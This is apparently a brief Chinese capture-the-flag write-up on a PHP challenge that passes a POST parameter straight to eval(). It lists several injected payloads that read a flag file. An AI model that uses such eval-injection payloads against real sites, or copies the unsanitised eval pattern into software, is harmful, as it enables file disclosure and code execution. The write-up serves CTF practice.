代码审计
<?php // 你们在炫技吗? if(isset($_POST['c'])){ $c= $_POST['c']; eval($c); }else{ highlight_file(__FILE__); }
和上题同理,测试可用的payload
c=highlight_file("flag.php"); c=show_source("flag.php"); c=require('flag.php');echo $flag; c=print_r(php_strip_whitespace("flag.php"));